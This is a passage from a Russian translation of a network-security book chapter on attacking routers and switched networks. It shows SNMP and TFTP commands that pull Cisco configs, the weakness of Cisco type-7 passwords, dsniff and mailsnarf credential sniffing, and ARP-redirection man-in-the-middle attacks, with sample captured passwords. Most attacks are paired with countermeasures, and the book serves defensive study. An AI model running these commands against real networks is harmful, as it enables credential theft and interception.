    Для того чтобы проверить, уязвим ли ваш маршрутизатор, можно выполнить описанные ниже операции. Воспользовавшись программой IP Network Browser компании SolarWinds (http: //www. solarwinds .net), укажите строки доступа SNMP, обеспечивающие чтение и запись, и просканируйте требуемое устройство или всю сеть. После завершения сканирования вы увидите информацию обо всех обнаруженных устройствах и данных SNMP (рис. 10.3).
    Если интересующее вас устройство сгенерировало ответ на SNMP-запрос и соответствующий элемент списка заполнен информацией, представленной в виде древовидной структуры, выберите из меню команду Nodes^View Config File. При этом запустится сервер TFTP и, если в системе защиты устройства имеется изъян, можно получить конфигурационный файл Cisco, как показано на рис. 10.4.



    Рис. 10.3. Программа IP Network Browser компании SolarWinds очень наыядно представляет информацию, которую можно полунить с помощью легко угадываемых строк доступа SNMP

    Получив конфигурационный файл, остается лишь расшифровать пароль. Для этого достаточно щелкнуть на кнопке Decrypt Password панели инструментов, как показано на рис. 10.5.



    Рис. 10.4. Модуль Cisco Config Viewer позволяет легко получить конфигурационный файл устройства Cisco. Для этого достаточно подобрать строку доступа, обеспечивающую чтение и запись



    Рис. 10.5. С использованием модуля Cisco Config Viewer компании SolarWinds очень просто расшифровать пароли Cisco, содержащиеся в конфигурационном файле

    Если же вы хотите проверить, является ли ваше устройство уязвимым, не прибегая к "хакерским методам", то можно воспользоваться базой данных Cisco, находящейся по адресу ftp://ftp.cisco.com/pub/mibs/supportlists/. Найдите свое устройство и перепишите на свой компьютер файл supportlist.txt. Затем вам остается проверить, поддерживается ли этим устройством база данных MIB старого формата, т.е. OLD-CISCO-SYS-MIB. Если это так, то вам придется принимать дополнительные меры по защите маршрутизатора.
    В системе UNIX конфигурационный файл Cisco можно получить с помощью единственной команды. Если вам известна строка доступа для чтения и записи устройства с адресом 10.11.12.13 и на вашем компьютере с IP-адресом, скажем 192.168.200.20, запущен сервер TFTP, то можно воспользоваться следующей командой, snmpset 10.11.12.13 private 1.3.6.1.4.1.9.2.1.55.192.168.200.20 s config.file
    В конфигурационном файле Cisco имеется два элемента, которые представляют особый интерес для злоумышленника, — пароль разрешения доступа (enable password) и пароль telnet-аутентификации. Оба эти элемента хранятся в конфигурационном файле в зашифрованном виде. Однако, как мы увидим несколько позже, расшифровать их достаточно просто. Ниже приведена строка, содержащая зашифрованный пароль разрешения доступа.
    enable password 7 08204Е
    А так выглядят строки, содержащие пароль telnet-аутентификации.

    line vty 0 4
    password 7 08204Е
    login

    Для того чтобы загрузить конфигурационный файл устройств Ascend, также можно воспользоваться командой snmpset следующего вида.

    snmpset 10.11.12.13 private
    1.3.6.1.4.1.529.9.5.3.0 а
    snmpset 10.11.12.13 private
    1.3.6.1.4.1.529.9.5.4.0 s config.file

    Контрмеры: защита базы данных MIB


    Обнаружение



    Самый простой способ обнаружения SNMP-запросов на запись в базу данных MIB заключается в использовании утилиты syslog, настроенной на регистрацию каждого запроса. Для этого сначала на компьютере с системой UNIX или NT нужно запустить демон syslog, а затем настроить его таким образом, чтобы он регистрировал соответствующие события. На устройстве Cisco это можно сделать с помощью следующей команды. logging 196.254.92.83

    Защита



    Для того чтобы воспрепятствовать злоумышленнику получить старую базу MIB, можно предпринять следующие меры.

    •  Используйте список ACL, чтобы разрешить применение протокола SNMP только для определенных узлов или сетей. На устройствах Cisco для этого нужно воспользоваться командой, имеющей следующий вид.

    access-list 101 permit udp 172.29.11.0 0.255.255.255 any eq 161 log

    •  Включите режим доступа с помощью SNMP только для чтения (ко). На устройствах Cisco для этого нужно воспользоваться командой, имеющей следующий вид. snmp-server community <сложная строка доступа> RO
    •  Лучше всего вообще отключите доступ через SNMP, воспользовавшись следующей командой, no snmp-server

    Слабость алгоритмов шифрования паролей Cisco



    Устройства Cisco, по крайней мере на момент написания данной книги, имели слабый алгоритм шифрования, используемый как при хранении пароля vty, так и пароля доступа. Оба пароля хранятся в конфигурационном файле устройств, а их взлом не представляет особого труда. Для того чтобы узнать, является ли ваш маршрутизатор уязвимым, просмотрите конфигурационный файл с помощью следующей команды.
    show config
    Если вы увидите строку, подобную показанной ниже, значит, пароль доступа к устройству легко расшифровать.
    enable password 7 08204Е
    С другой стороны, если в конфигурационном файле вы увидите запись, подобную приведенной ниже, можете не волноваться — пароль доступа надежно защищен (чего, к сожалению, нельзя сказать о пароле telnet).
    enable secret 5 $1$.pUt$w8jwdabc5nHk1IHFWcDav
    Эта запись означает, что грамотный администратор Cisco вместо используемой по умолчании команды enable password применил команду enable secret, активизирующую режим шифрования пароля по алгоритму MD5, который обеспечивает большую надежность, чем стандартный алгоритм Cisco. Однако, насколько нам известно, шифрование паролей с помощью MD5 распространяется только на пароль доступа, но неприменим для шифрования таких паролей, как пароли vty.

    line vty 0 4
    password 7 08204Е
    login

    Слабость встроенного алгоритма шифрования Cisco объясняется тем, что он основан на использовании операции XOR и постоянного инициализирующего значения (seed value). Шифруемые пароли Cisco могут иметь до 11 алфавитно-цифровых символов разного регистра. Первые два байта пароля выбираются случайным образом из диапазона от 0x0 до 0xF, а оставшиеся представляют собой строку, полученную путем объединения с помощью операции XOR пароля и заданного блока символов dsfd;kfoA,.iyewrkldJKDHSUB.
    Расшифровать такой пароль можно с помощью одной из множества программ, имеющихся в Internet. . Первая из них, написанная хакером Хоббитом (Hobbit) (http://www.avian.org), представляет собой сценарий командной оболочки. Вторая программа, ciscocrack.c, написана на языке С хакером Сфайксом (SPHiXe). Ее можно найти в многочисленных статьях, посвященных анализу паролей Cisco. Третьей программой является приложение Palm Pilot, созданное доктором Маджем (Dr. Mudge), одним из участников группы L0pht.  И наконец, модуль расшифровки пароля Cisco был создан компанией SolarWinds. В системе NT этот модуль функционирует как часть программного пакета управления сетью. Его можно найти по адресу http://www.solarwinds.net.

    Модуль расшифровки паролей Cisco компании SolarWinds



    Для тех, кто лучше знаком с системой Windows, существует соответствующая версия модуля расшифровки паролей Cisco, подготовленная компанией SolarWinds из города Тулса штата Оклахома (Tulsa, Oklahoma). Компания SolarWinds разрабатывает сетевое программное обеспечение для больших телекоммуникационных компаний и включает модуль расшифровки в состав приложения просмотра параметров настройки устройств Cisco (Cisco Config Viewer). Кроме того, этот модуль распространяется и как самостоятельное приложение (рис. 10.6).



    Рис. 10.6. Программа Cisco Password Decryption компании Solar-Winds имеет графический пользовательский интерфейс и является очень простым средством расшифровки паролей Cisco

    Контрмеры: защита паролей Cisco



    Единственным решением проблемы защиты пароля доступа (enable password) является использование для изменения пароля команды enable secret. Эта команда защищает пароль доступа с помощью алгоритма шифрования MD5, для которого пока что нет известных методов быстрого взлома. К сожалению, остальные пароли Cisco, такие как пароли доступа vty, защитить ни этим, ни каким-либо другим методом нельзя.

    Получение файлов с помощью TRP



    Практически все маршрутизаторы поддерживают использование протокола TFTP (Trivial File Transfer Protocol). Этот протокол представляет собой основанный на протоколе UDP механизм передачи файлов, применяемый для резервного копирования и восстановления конфигурационных файлов, который связан с портом UDP 69. Как вы понимаете, обнаружить эту службу, запущенную на вашем устройстве, достаточно просто с помощью утилиты nmap.
    [root@happy] nmap -sU -p69 -nw target
    Использование TFTP для получения конфигурационных файлов обычно является весьма тривиальной операцией (при условии, конечно, что администратор сети употребляет общепринятые названия конфигурационных файлов). Например, выполнив обратное DNS-преобразование адреса устройства, находящегося в нашей сети (192.168.0.1), мы можем установить, что оно имеет DNS-имя lax-serial-rtr. Теперь можно просто попытаться получить файл .cfg с помощью следующих команд, в которых имя DNS используется в качестве имени конфигурационного файла.

    [root@happy] tftp
    > connect 192.168.0.1
    > get lax-serial-rtr.cfg
    > quit

    Если ваш маршрутизатор уязвим, то в текущем каталоге вашего компьютера вы наверняка найдете конфигурационный файл (lax-serial-rtr.cfg) маршрутизатора. В нем, скорее всего, будут содержаться все строки доступа SNMP, а также списки управления доступом. Более подробная информация о том, как использовать TFTP для получения информации об устройствах Cisco, находится в архиве группы Packet Storm.

    Контрмеры: защита от применения ТFTР



    Для того чтобы устранить угрозу, таящуюся в использовании протокола TFTP, можно предпринять следующие меры.

    •  Вообще запретите доступ с помощью TFTP. Синтаксис команды, которую можно использовать для этих целей, существенно зависит от модели маршрутизатора, поэтому сначала внимательно изучите документацию. Для моделей ряда Cisco 7000 можно попробовать команду следующего вида. no tftp-server flash <устройство:имя_файла>
    •  Для контроля доступа с помощью TFTP настройте соответствующий фильтр. Это можно осуществить с помощью команды, подобной следующей.

    access-list 101 deny udp any any eq 69 log !

    Конфигурационные файлы устройств компании Bay



    Программное обеспечение управления сетью компании Bay Networks, диспетчер Site Manager, позволяет администраторам выполнять тестирование состояния сети, включая проверку SNMP-статуса устройства и установление факта его работоспособности с помощью пакетов IСМР. К сожалению, конфигурационные файлы .cfg, предназначенные для хранения параметров Site Manager, хранятся в незашифрованном виде. Помимо прочего, в этом файле хранятся также строки доступа SNMP. Если злоумышленнику удастся проникнуть на компьютер, работающий под управлением Site Manager, все, что ему нужно сделать, — это скопировать конфигурационные файлы в свою версию Site Manager и найти в них информацию о строках доступа SNMP.

    Контрмеры: защита конфигурационных файлов Вау



    Самая простая защитная мера заключается в ограничении списка пользователей. которым разрешено копировать конфигурационные файлы. Для этого достаточно разрешить чтение этих файлов только суперпользователю root (или только администратору, отвечающему за настройку маршрутизатора).


    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    7.gif

    Изображение: 

    8. Множественный доступ и коммутация пакетов



    Множественный доступ и коммутация пакетов


    Общая передающая среда (как Ethernet, так и Token Ring) применяется для обмена данными в сетях на протяжении более двух десятков лет. Этот подход был разработан Бобом Меткафом (Bob Metcalfe) для стандарта Ethernet в исследовательском центре компании Xerox, расположенном в г. Пало Альто (PARC — Palo Alto Research Center), и получил название CSMA/CD (выявление множественного доступа к линии/распознавание конфликтов — Carrier Sense Multiple Access/Collision Detection). При такой традиционной топологии сетевой адаптер Ethernet отправляет исходящий поток данных каждому узлу сегмента. С одной стороны, это гарантирует, что принимающий адаптер, где бы он ни находился, получит, как и все остальные адаптеры сети, предназначавшиеся ему данные (хотя остальным сетевым адаптерам они вовсе не нужны). С другой стороны, постоянно рассылаемые по всей сети пакеты мешают друг другу и при повышении интенсивности работы могут возникать ситуации, когда пропускная способность канала не соответствует интенсивности передаваемых по нему данных. Кроме того, с точки зрения безопасности, множественный доступ к передающей среде — это "бомба замедленного действия", которая рано или поздно может привести к нарушениям безопасности. Однако, к сожалению, сети Ethernet с множественным доступом весьма распространены в настоящее время и. похоже, вряд ли исчезнут в обозримом будущем.
    Между тем уже довольно давно существует технология Ethernet, построенная на принципе коммутации пакетов, которая далеко позади оставляет традиционную технологию Ethernet. Технология коммутации пакетов основывается на использовании большой таблицы адресов MAC (Media Access Control — управление доступом к компонентам среды). При использовании МАС-адресов данные отправляются с помощью специального алгоритма, реализованного в виде быстродействующей микросхемы, непосредственно получателю этих данных и никому более (за исключением лишь некоторых особых случаев).
    Однако и в коммутируемых сетях также имеется возможность перехвата пересылаемых пакетов. Примером такого устройства могут быть коммутаторы Catalyst компании Cisco, имеющие средства поддержки технологии SPAN (Switched Port Analyzer). Перенаправив определенные порты или виртуальные локальные сети (VLAN — Virtual Local Area Networks) на заданный порт, администратор может перехватывать пакеты так, как если бы они передавались по традиционной сети с множественным доступом. В настоящее время этот прием часто используется в системах выявления вторжений (IDS — Intrusion Detection System) с целью обеспечения возможности прослушивания передаваемого потока данных и выявления нарушений безопасности. 
    Еще более опасной для коммутируемых сетей оказалась технология, реализованная Дагом Сонгом (Dug Song) в его программе-анализаторе dsniff. Эта программа позволяет захватывать трафик коммутируемой сети, полностью перенаправляя его с заданного узла на узел, на котором она установлена. Такая технология достаточно проста и способна разрушить традиционное мнение о том, что сеть с коммутацией пакетов обеспечивает достаточно высокий уровень безопасности.


    9. Определение типа сети



    Определение типа сети


    Определить, к какому типу относится используемая вами сеть (т.е. к сетям с множественным доступом или же к сетям с коммутацией пакетов), очень просто. Используя простейшую программу перехвата пакетов, например tcpdump (для NT или UNIX), вы получите все данные, необходимые для того, чтобы сделать однозначное заключение.
    В коммутируемых сетях вы сможете увидеть только трафик широковещательных сообщений (broadcast traffic), трафик групповых сообщений (пакеты, передаваемые группе узлов; multicast traffic), а также потоки данных, отправляемые и получаемые вашим компьютером. В показанном ниже примере сеанса работы утилиты tcpdump, запущенной в коммутируемой сети, видно, что утилита перехватила только циркулярную рассылку по протоколу SAP (Service Advertisement Protocol) и пакеты, отправляемые по протоколу разрешения адресов (ARP — Address Resolution Protocol).

    20:20:22.530205 0:80:24:53:ae:bd >
    1:80:c2:0:0:0 sap 42 ui/C len=43
    0000 0000 0080 0000 8024 53ae dlOO 0000
    0080 0000 8024 53ae d!80 OdOO 0014 0002
    OOOf 0000 0000 0000 0000 00
    20:20:24.610205 0:80:24:53:ae:bd >
    1:80:c2:0:0:0 sap 42 ui/C len=43
    0000 0000 0080 0000 8024 53ae dlOO 0000
    0080 0000 8024 53ae d!80 OdOO 0014 0002
    OOOf 0000 0000 0000 0000 00
    20:20:25.660205 arp
    who-has 172.29.11.100 tell 172.29.11.207
    20:20:26.710205 0:80:24:53:ae:bd
    > 1:80:c2:0:0:0 sap 42 ui/C len=43
    0000 0000 0080 0000 8024 53ae dlOO 0000
    0080 0000 8024 53ae d!80 OdOO 0014 0002
    OOOf 0000 0000 0000 0000 00
    20:20:28.810205 0:80:24:53:ae:bd >
    1:80:c2:0:0:0 sap 42 ui/C len=43
    0000 0000 0080 0000 8024 53ae dlOO 0000
    0080 0000 8024 53ae d!80 OdOO 0014 0002
    OOOf 0000 0000 0000 0000 00
    20:20:30.660205 arp who-has
    172.29.11.100 tell 172.29.11.207

    В то же время в сетях с множественным доступом к передающей среде вы увидите все типы данных, пересылаемых по сети разными узлами. Например, в показанном ниже фрагменте сеанса работы утилиты tcpdump, легко обнаружить потоки данных, предназначенные другим компьютерам (естественно, такого рода информация гораздо интереснее для злоумышленников, чем приведенная выше).

    20:25:37.640205 192.168.40.66.23 >
    172.29.11.207.1581: Р 31:52(21)
    ack 4С win 8760 (DF) (ttl 241, id 21327)
    20:25:37.640205 172.29.11.207.1581 >
    192.168.40.66.23: Р 40:126(86)
    ack 52 win 32120 (DF")
    [tos 0x10] (ttl 64, id 4221)
    20:25:37.780205 192.168.40.66.23 >
    172.29.11.207.1581: P 52:73(21)
    ack 126 win 8760 (DF) (ttl 241,id 21328)
    20:25:37.800205 172.29.11.207.1581 >
    192.168.40.66.23: . ack 73
    win 32120 (DF) [tos 0x10] (ttl 64,id 4222)
    20:25:37.960205 192.168.40.66.23 >
    172.29.11.207.1581: P 73:86(13)
    ack 126 win 8760 (DF) (ttl 241,id 21329)
    20:25:37.960205 172.29.11.207.1581 >
    192.168.40.66.23: P 126:132(6)
    ack 86 win 32120 (DF)
    [tos 0x10] (ttl 64, id 4223)
    20:25:38.100205 192.168.40.66.23 >
    172.29.11.207.1581: P 86:89(3)
    ack 132 win 8760 (DF) (ttl 241, id 21330)
    20:25:38.120205 172.29.11.207.1581 >
    192.168.40.66.23: . ack 89
    win 32120 (DF) [tos 0x10]
    (tti 64,id 4224)


    10. Пароли на блюдечке: dsniff



    Пароли на блюдечке: dsniff


    Конечно, с помощью утилиты tcpdump можно без проблем определить тип используемой сети, однако что вы скажете о получении главных жемчужин компьютерного мира — паролей? Для этих целей можно приобрести чудовищный по предоставляемым возможностям программный пакет SnifferPro или воспользоваться более дешевыми средствами, например, CaptureNet, разработанным Лаврентием Никулой (Laurentiu Nicula). Однако лучше всего прибегнуть к программе Дага Сонга (Dug Song). Он разработал одно из наиболее сложных средств перехвата паролей — программу dsniff.
    Зачастую можно встретить приложения, в которых в качестве паролей используется незашифрованный текст. Кроме того, подобная конфиденциальная информация хранится далеко не в лучшем месте. Примерами таких приложений могут послужить следующие: FTP, telnet, POP, SNMP, HTTP, NNTP, ICQ, IRC, Socks, NFS (сетевая файловая система— Network File System), mountd, rlogin, IMAP, AIM, XI1, CVS, Napster, Citrix ICA, pcAnywhere, NAI Sniffer, Microsoft SMB и Oracle SQL. В большинстве перечисленных выше приложений либо используются незашифрованные пользовательские имена и пароли, либо применяются упрошенные алгоритмы шифрования, сокрытия и декодирования, которые нельзя рассматривать как серьезную преграду для взломщиков. Именно в этом случае можно ощутить всю мощь программы dsniff.
    С помощью программы dsniff можно прослушать трафик любого сетевого сегмента независимо от того, относится ли он к сети с множественным доступом или же к сети с коммутацией пакетов. Эту программу можно получить по адресу http://naughty.monkey.org/~dugsong/dsniff/, а затем выполнить ее компиляцию. С Web-узла компании еЕуе (http://www.eeye.com) можно также загрузить и попробовать в действии версию этой программы для платформы Win32. В этом случае потребуется установить также и библиотеку WinPcap, которая, однако, может вызвать некоторые проблемы в системах с конфликтом драйверов. Эту библиотеку можно найти по адресу http://netgroup-serv.polito.it/winpcap/.
    При запуске программы dsnif f в системе Linux будут получены все незашифрованные или простые пароли сетевого сегмента.

    [root@mybox dsniff-1.8] dsniff
    ---------------
    05/21/00 10:49:10 bob -> unix-server (ftp)
    USER bob
    PASS dontlook
    ---------------
    05/21/00 10:53:22 karen -> lax-cisco (telnet)
    karen
    supersecret

    ---------------
    05/21/00 11:01:11 karen -> lax-cisco (snmp)
    [version 1]
    private

    Кроме средства перехвата паролей dsnif f, в состав пакета входят разнообразные средства поиска других слабых мест, такие как mailsnarf и webspy. mailsnarf представляет собой небольшое приложение, позволяющее собирать все почтовые сообщения и отображать их содержимое на экране, как если они были написаны вами лично, webspy — это мощная утилита, которая окажется полезной, если требуется определить, какие страницы в Web посетили пользователи. При этом в Web-броузере автоматически будут отображаться Web-страницы, которые были просмотрены определенным пользователем.

    [root]# mailsnarf
    From stu@hackingexposed.com Mon May 29 23:19:10 2000
    Message-ID: 0017Olbfca02$790cca90$6433a8cO@foobar.com
    Reply-To: "Stuart McClure" stu@hackingexposed.com
    From: "Stuart McClure" stu@hackingexposed.com
    To: "George Kurtz" george@hackingexposed.com
    References: 0022Olbfc729$7d7ffe70$ab8dOb!8@JOC
    Subject: Re: conference call
    Date: Mon, 29 May 2000 23:44:15 -0700
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary="———=_NextPart_000_0014_01BFC9C7.CC970F30"
    X-Priority: 3 X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook Express 5.00.2919.6600
    X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
    This is a multi-part message in MIME format.
    ---=_NextPart_000_0014_01BFC9C7.CC970F30
    Content-Type: text/plain;
    charset="iso-8859-l"
    Content-Transfer-Encoding: quoted-printable
    Have you heard the latest one about the...
    [content censored here]
    - Stu

    Чтение почтовых сообщений ваших соседей может показаться забавным занятием, однако не забывайте о том, что подобные действия вряд ли можно назвать законными.

    Контрмеры: защита от dsniff



    Традиционным способом защиты от перехвата незашифрованных паролей является переход от сетевой топологии Ethernet с множественным доступом к сети с коммутацией пакетов. Однако как вы узнали из предыдущих разделов, такая мера практически не способна предотвратить атаки с применением программы dsniff.
    В этом случае ко всему сетевому трафику лучше всего применить один из алгоритмов шифрования. Воспользуйтесь преимуществами SSH для туннелирования всего трафика или возможностями средств, в которых реализованы алгоритмы шифрования по открытому ключу (PKI — Public Key Infrastructure), например продуктами компании Entrust Technologies. Это позволит выполнить сквозное шифрование всего потока сетевых данных.


    11. Анализ пакетов на коммутаторе сети



    Анализ пакетов на коммутаторе сети


    На первый взгляд кажется, что для повышения скорости и уровня безопасности можно просто добавить в сеть новый коммутатор. Если вы считаете, что это позволит удержать любознательных пользователей от прослушивания интенсивного сетевого трафика, то такая позиция может вызвать лишь улыбку. Неужели вы думаете, что новый коммутатор способен разрешить все существующие проблемы? Подумайте хорошенько еще раз.
    Протокол ARP (Address Resolution Protocol — протокол разрешения адресов, RFC 826) обеспечивает динамическое преобразование 32-битовых IP-адресов в 48-битовые физические адреса сетевых устройств. Когда узлу требуется обратиться к соседним устройствам из той же сети (включая шлюз, используемый по умолчанию), он рассылает широковещательные сообщения ARP для поиска физического адреса требуемого узла. Соответствующий узел отвечает на запрос ARP, сообщая свой физический адрес, после чего и начинается взаимодействие.
    К сожалению, трафик ARP с исходного узла можно перенаправить на компьютер взломщика. Это можно осуществить даже в сетях с коммутацией пакетов. Перехваченные сообщения можно просмотреть с использованием анализатора сетевых пакетов, а затем передать их в реальный пункт назначения. Этот сценарий известен как атака с применением "третьего среднего" (man in the middle). Такой подход оказывается относительно простым. Рассмотрим его реализацию на примере.

    Перенаправление ARP



    В рассматриваемом примере три компьютера соединены с сетевым коммутатором. Система crush является шлюзом, заданным по умолчанию, с IP-адресом 10.1.1.1. Компьютер shadow— это исходный узел с IP-адресом 10.1.1.18. Система twister представляет собой компьютер взломщика, который будет выполнять роль "третьего-среднего". Его IP-адрес 10.1.1.19. Для подготовки нападения на узле twister запустим утилиту arpredirect, входящую в состав пакета dsniff Дага Сонга. Эта утилита позволит нам перехватывать пакеты, передаваемые исходным узлом по сети другому узлу, который обычно представляет собой шлюз, используемый по умолчанию.

    Перед тем как приступить к изучению этого подхода в собственной сети, обсудите этот вопрос с сетевым администратором. Если на вашем коммутаторе включен режим защиты портов, то это может привести к блокированию всех пользователей, обратившихся к нему.

    Не забывайте о том, что все компьютеры соединены с коммутатором и у нас имеется возможность просматривать лишь широковещательный сетевой трафик. Однако как показано ниже, с помощью утилиты arpredirect мы сможем просмотреть весь поток сообщений, передаваемый между узлами shadow и crush.
    На узле twister выполним следующую команду.

    [twister] ping crush
    PING 10.1.1.1 from 10.1.1.19 : 56(84) bytes of data.
    64 bytes from 10.1.1.1: icmp_seq=0 ttl=128 time=1.3 ms
    [twister] ping shadow
    PING 10.1.1.18 from 10.1.1.19 : 56(84) bytes of data.
    64 bytes from 10.1.1.18: icmp_seq=0 ttl=255 time=5.2 ms



    В результате в таблицу ARP компьютера twister будет помещен физический адрес соответствующих узлов, которые понадобятся при запуске утилиты arpredirect.

    [twister] arpredirect -t 10.1.1.18 10.1.1.1
    intercepting traffic from 10.1.1.18 to 10.1.1.1 (^С to exit)...

    После выполнения этой команды весь поток сообщений, передаваемый с узла shadow на используемый по умолчанию шлюз crush, будет перенаправляться на компьютер взломщика, twister. На этом узле необходимо также включить режим последующей передачи IP-пакетов (forwarding IP traffic), чтобы он функционировал в качестве маршрутизатора и после перехвата сообщений с узла shadow перенаправлял их на узел crush. На компьютере twister режим передачи пакетов можно активизировать на уровне ядра, однако делать этого не рекомендуется, поскольку в этом случае могут передаваться также пакеты ICMP, что может привести к нарушению всего процесса. Вместо этого воспользуемся утилитой fragrouter (http://www.anzen.com/ research/nidsbench/fragrouter.html) и активизируем обычный режим передачи IP-пакетов с помощью следующей команды.

    [twister] fragrouter -Bl
    fragrouter: base-1: normal IP forwarding
    10.1.1.18.2079 > 192.168.20.20.21: S 592459704:592459704(0)
    10.1.1.18.2079 > 192.168.20.20.21: P 592459705:592459717(12)
    10.1.1.18.2079 > 192.168.20.20.21: . ack 235437339
    10.1.1.18.2079 > 192.168.20.20.21: P 592459717:592459730(13)
    <вывод сокращен>

    И наконец, на узле twister нужно активизировать простую программу анализа пакетов, чтобы иметь возможность перехватывать все ценные данные. Для получения более подробной информации об анализаторах сетевых пакетов читайте главы 6 и 8.

    [twister] linsniff
    Linux Sniffer Beta v. 99 Log opened.
    -----[SYN] (slot 1)
    10.1.1.18 => 192.168.20.20 [21]
    USER saumil
    PASS lamDaman!!
    PORT 10,1,1,18,8,35
    NLST
    QUIT
    -----[SYN] (slot 1)
    10.1.1.18 => 192.168.20.20 [110]
    USER saumil PASS lamOwned
    [FIN] (1)

    Теперь посмотрим, что же произойдет. После запуска утилиты arpredirect узел twister будет передавать фальшивые ARP-ответы узлу shadow и выдавать себя за узел crush. Узел shadow успешно обновит свою таблицу ARP и поместит в нее "новый" физический адрес узла crush. После этого пользователь компьютера shadow начнет сеанс FTP и POP с узлом 192.168.20.20. Однако вместо передачи пакетов на компьютер crush, реальный используемый по умолчанию шлюз, узел shadow будет введен в заблуждение, поскольку в его таблицу ARP были внесены соответствующие изменения. Через узел twister весь трафик будет перенаправляться на узел 192.168.20. 20, поскольку с помощью утилиты fragrouter мы активизировали режим перенаправления IP-пакетов. Другими словами, узел twister будет играть роль маршрутизатора.
    В рассмотренном примере мы просто перенаправили все сетевые пакеты, передаваемые с узла shadow на узел crush. Однако вполне возможно перенаправить весь трафик на узел twister, опустив параметр -t.

    [twister] arpredirect 10.1.1.1
    intercepting traffic from LAN to 10.1.1.1 (ЛС to exit)...

    Нетрудно догадаться, что в сети с интенсивным трафиком это приведет к настоящему хаосу.
    Если вы не очень хорошо знакомы с системой UNIX, то у вас может возникнуть закономерный вопрос: можно ли утилиту arpredirect использовать в системе Windows. К сожалению, утилита arpredirect не перенесена на эту платформу, но ничто не мешает нам воспользоваться альтернативными вариантами. Для некоторых коммутаторов можно установить сетевое подключение к порту простого концентратора. Затем к этому концентратору можно подключить компьютер с системой UNIX, на котором запущена утилита arpredirect, а также компьютер под управлением Windows, на котором запушена выбранная вами программа-анализатор. Система UNIX будет успешно перенаправлять весь трафик, тогда как система Windows будет его перехватывать на локальном концентраторе.

    Контрмеры: предотвращение перенаправленияАВР



    Как вы увидели в предыдущем разделе, не составляет никаких проблем генерировать ложные ответы ARP и модифицировать таблицу ARP на большинстве узлов локальной сети. Где это только возможно, задавайте статические записи таблицы ARP, особенно на важных системах. Стандартный прием заключается в задании статических записей АКР, определяющих взаимодействие брандмауэра и пограничных маршрутизаторов. Это можно реализовать следующим образом.

    [shadow] arp -s crush 00:00:С5:74:ЕА:ВО
    [shadow] arp -a
    crush (10.1.1.1) at 00:00:05:74:ЕА:ВО [ether] PERM on ethO

    Обратите внимание на флаг PERM, который является признаком статической записи ARP.
    Использование постоянных статических маршрутов для внутренних сетевых узлов является не самой распространенной практикой в мире. Поэтому можно применять утилиту arpwatch, предназначенную для отслеживания пар АКР-адрес/IР-адрес и уведомления о любых обнаруженных изменениях.
    Для активизации этого режима запустите утилиту arpwatch, указав при этом интерфейс, мониторинг которого нужно осуществлять. [crush] .arpwatch -i rl0
    Как видно из следующего примера, утилита arpwatch обнаружила работу утилиты arpredirect и поместила соответствующую запись в журнал /var/log/messages.

    May 21 12:28:49 crush: flip
    flop 10.1.1.1 0:50:56:bd:2a:f5 (0:0:c5:74:ea:bO)

    Поскольку подобную деятельность выявить не очень легко, то такой мониторинг будет полезен при ее идентификации.

    snmpsniff



    Если ваш компьютер находится в сегменте сети с множественным доступом, то совсем неплохо ее "прослушать" и узнать, что же в ней происходит. Воспользуйтесь мощным анализатором пакетов SnifferPro компании Network Associates или запустите утилиту snmpsnif f, разработанную Нуно Леитао (Nuno Leitao, nuno.leitao@convex.pt). а затем посмотрите, какую информацию вы получили.
    Утилита snmpsniff — это прекрасное средство для перехвата не только строк доступа, но и запросов SNMP. Достаточно запустить ее с указанными ниже параметрами, чтобы практически гарантированно получить нечто интересное.

    [root@kramer snmpsniff-0.9b]# ./snmpsniff.sh
    snmpsniffer: listening or. ethO
    (05:46:12) 172.31.50.100(secret)-» 172.31.50.2 (ReqID:1356392156)
    GET:
    <.iso.org.dod.internet.ragmt.mib-2.system.1.0>(NULL)
    = NULL (05:46:12) 172.31.50.2(secret)-» 172.31.50.100
    (ReqID:1356392156)
    RESPONSE (Err:0): <.iso.org.dod.internet.mgmt.mib-2.system.1.0>
    (Octet String) = OCTET STRING- (ascii) : Cisco Internetwork
    Operating System Software ..IOS (tin) 3000 Software (IGS-I-L),
    Version 11.0(16), RELEASE SOFTWARE (fcl)..Copyright (c) 1986-1997
    by Cisco Systems, Inc...Compiled
    Tue 24-Jun-97 12:20 by jaturner

    Как видно из приведенного выше фрагмента, злоумышленнику удалось узнать одну из строк доступа (secret), которая может оказаться строкой доступа, позволяющей не только получать, но и записывать данные на маршрутизатор 172.31.50.2 с помощью SNMP. Теперь злоумышленник сможет получить доступ не только к устройствам вашей сети, но и попробовать взломать еще одну "жертву" — компьютер с IP-адресом 172.31.50.100.

    Контрмеры: защита трафика ЗММР



    Одна из защитных мер, позволяющих предотвратить перехват трафика SNMP, заключается в его шифровании. В обоих версиях этого протокола, SNMP\2 и SNMPvS, имеется возможность применения алгоритмов шифрования и стандарта DES для шифрования конфиденциальной информации. Альтернативный подход заключается в реализации защищенного канала на базе частной виртуальной сети (VPN — Virtual Private Network). При использовании клиентского программного обеспечения VPN, разработанного компанией Entrust (http://www.entrust.com) или компанией NortelNetworks (http://www.nortelnetworks.com), гарантируется шифрование трафика между клиентским узлом и концом канала VPN.

    Ложные пакеты RIP



    После успешной идентификации маршрутизаторов вашей сети, опытный взломщик наверняка предпримет попытку найти те из них, которые поддерживают протокол маршрутизации RIP (Routing Information Protocol) версии 1 (RFC 1058) или 2 (RFC 1723). Почему? Дело в том, что с его помощью легко сгенерировать ложные пакеты. Объясняется это следующими причинами.

    •  Протокол RIP базируется на протоколе UDP (порт UDP 520) и таким образом также не требует наличия открытого соединения (connectionless). Другими словами, соответствующий пакет будет принят от любого узла, несмотря на то, что такой пакет никогда не был отправлен.
    •  В протоколе RIP версии 1 отсутствует механизм аутентификации, что позволяет любому узлу отправить пакет маршрутизатору RIP и получить требуемые данные.
    •  Протокол RIP версии 2 поддерживает упрощенную аутентификацию, позволяющую использовать пароли в виде незашифрованного текста длиной 16 байт. Однако, как теперь вам известно, подобные пароли можно без проблем перехватить.

    В результате взломщик может просто отправить маршрутизатору RIP ложные пакеты и указать, чтобы пакеты передавались в другую сеть или узел, а не на требуемый узел. Вот как можно осуществить атаку с помощью ложных пакетов RIP.
    1. Идентифицируйте маршрутизатор RIP, который вы планируете атаковать. Для этого выполните сканирование UDP-порта с номером 520.
    2. Определите таблицу маршрутизации.

